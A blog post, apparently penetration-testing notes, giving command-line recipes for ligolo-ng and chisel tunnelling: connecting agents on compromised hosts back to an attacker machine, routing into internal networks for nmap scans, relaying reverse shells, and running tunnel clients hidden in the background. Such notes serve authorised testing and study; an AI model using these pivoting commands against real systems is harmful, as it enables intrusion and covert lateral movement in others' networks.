首页 > 其他分享 >隧道工具推荐

隧道工具推荐

时间:2024-02-24 19:56:17浏览次数:19  
标签:127.0 隧道 -- 推荐 chisel 192.168 client 8080 工具

ligolo-ng

It's convenient when pivot network and excute nmap scan.And it could receive reverse shell and download file by webserver from kali.
first init:

sudo ip tuntap add user rightevil mode tun ligolo
sudo ip link set ligolo up

start in kali

./proxy -selfcert

agent connect
windows

.\agent.exe -connect 192.168.45.248:11601 -ignore-cert

linux

./agent -connect 192.168.45.153:11601 -ignore-cert

choose session

session

enum interface

ifconfig

add innet

sudo ip route add 172.16.216.0/24 dev ligolo

choose session and start tunnel connect

session
start

start scan directly

nmap -sn 172.16.1.0/24

set listener(capture reverse shell and transfer file)

listener_add --addr 0.0.0.0:443 --to 127.0.0.1:443
listener_add --addr 0.0.0.0:81 --to 127.0.0.1:80

list listener

listener_list

chisel

!!!important!!!
the client and server version should be the same
it cant listen reverse shell in innet network!!!

Because of his niche, he is sometimes not discovered or blocked by firewalls etc.
but it spend more time when excute nmap scan,cause socks proxy just support TCP scan.and chisel cant receive reverse shell.

socks proxy

kali:

chisel server --port 8080 --reverse

target:
run in background

Start-Job -ScriptBlock { c:\my\chisel.exe client 192.168.45.223:8080 R:socks }
/tmp/chisel client 192.168.45.153:8080 R:socks > /dev/null 2>&1 &

just run

c:\my\chisel.exe client 192.168.45.223:8080 R:socks
/tmp/chisel client 192.168.45.153:8080 R:socks

then use proxy to excute command to communicate with innet network

port forward

revserse mode: share remote:port from client to server's local:port
strict mode: share remote:port from server to client's local:port
Backward joins are more common than forward joins. Because the firewall will prevent us from actively connecting to the target
server:

chisel server --port 8080 --reverse
chisel.exe server --port 8080 --reverse

client:

/tmp/chisel client 192.168.45.153:8080 R:8000:127.0.0.1:8000 
.\chisel.exe client 192.168.45.153:8080 R:8000:127.0.0.1:8000

run in background

/tmp/chisel client 192.168.45.153:8080 R:8000:127.0.0.1:8000 &
Start-Job -ScriptBlock { .\chisel.exe client 192.168.45.153:8080 R:8000:127.0.0.1:8000 }

more than one port

/tmp/chisel client 192.168.45.153:51234 R:8000:127.0.0.1:8000 R:8443:127.0.01:8443
# "R" is shorthand for "127.0.0.1"
# Effectively, listen on 127.0.0.1 on attack box

just add the remote_socket

标签:127.0,隧道,--,推荐,chisel,192.168,client,8080,工具
From: https://www.cnblogs.com/rightevil/p/18018454

相关文章

  • UE5工具管理插件——UserToolBox
    视频链接:https://www.bilibili.com/video/BV1Vu4m1N75U/?spm_id_from=333.1007.tianma.41-3-161.click&vd_source=0b48a4de5d48210298dd8b91fa633329UserToolBoxUserToolBox是一个可以管理蓝图脚本和Python命令,python脚本的插件1启动插件2创建选项卡3修改选项卡的名字可......
  • Java SM2 工具类,依赖bcprov-jdk15on
    老版本bcprov-jdk15on和新版本的有点不一样,新版本的签名后需要DER格式和r|s格式转换,可以和老版本一样<dependency><groupId>org.bouncycastle</groupId><artifactId>bcprov-jdk15on</artifactId><version>1.70</version></dependency>import......
  • Java SM4 工具类,依赖bcprov-jdk15on
    Java实现SM4国密加解密,依赖bcprov-jdk15on.jar<dependency><groupId>org.bouncycastle</groupId><artifactId>bcprov-jdk15on</artifactId><version>1.70</version></dependency>/***@authorEvanY*@since......
  • Java RSA 加解密工具类,直接用
    importorg.junit.Test;importjavax.crypto.Cipher;importjavax.crypto.NoSuchPaddingException;importjava.io.ByteArrayOutputStream;importjava.nio.charset.Charset;importjava.nio.charset.StandardCharsets;importjava.security.*;importjava.security.i......
  • 27.6k star,推荐一款开源的网页性能分析工具
    27.6kstar,推荐一款开源的网页性能分析工具原创 大侠之运维 大侠之运维 2024-02-2407:03 上海 听全文点击上方蓝字  关注大侠之运维大家好,这里是大侠之运维,文末有彩蛋。Lighthouse:一款优秀的网页性能分析工具Lighthouse是一款由GoogleChrome团队开发的......
  • MD5加密工具类
     介绍:一个简单的MD5加密工具类,用于对字符串进行MD5加密。 /***@description:MD5加密工具类*/publicclassMD5Util{//将字节数组转换为对应的十六进制字符串。privatestaticStringbyteArrayToHexString(byteb[]){StringBufferresultSb=......
  • 【论文随笔】会话推荐系统综述(A Survey on Conversational Recommender Systems)
    前言今天读的论文为一篇于2021年5月发表在《ACM计算机调查》(ACMComputingSurveys)的论文,文章提供了对话式推荐系统(CRS)的全面综述,探讨了CRS的定义、概念架构、交互方式、知识元素、计算任务以及评估方法。文章还讨论了CRS在不同应用环境中的实现,如智能家居助手和聊天机器人,并指......
  • Eclipse工具栏图标过小
    1.问题图标过小看的很难受2.解决参考:eclipse等软件工具栏图标过小问题解决2.1打开exe文件属性设置2.2点击“兼容性”,“更改高DPI设置”2.3勾选“替代高DPI缩放行为”,选择“系统(增强)”2.4一路确定,重启软件即可2.5备注:在“替代高DPI缩放行为”处,各选项解释:应用......
  • 好用的工具类(长期更新)
    1、笛卡尔积工具记不得参考谁的了,原文不贴了入参结构List<List>实现importjava.util.ArrayList;importjava.util.Arrays;importjava.util.List;/***@authorzionchen*@date2023/9/2511:39*/publicclassDescartesUtil{/***n个list元素笛卡......
  • powershell 制作工具菜单
    functionmainMenu{$mainMenu='X'while($mainMenu-ne''){Clear-HostWrite-Host"`n`t`tMyScript`n"Write-Host-ForegroundColorCyan"MainMenu"Write-Host-ForegroundColo......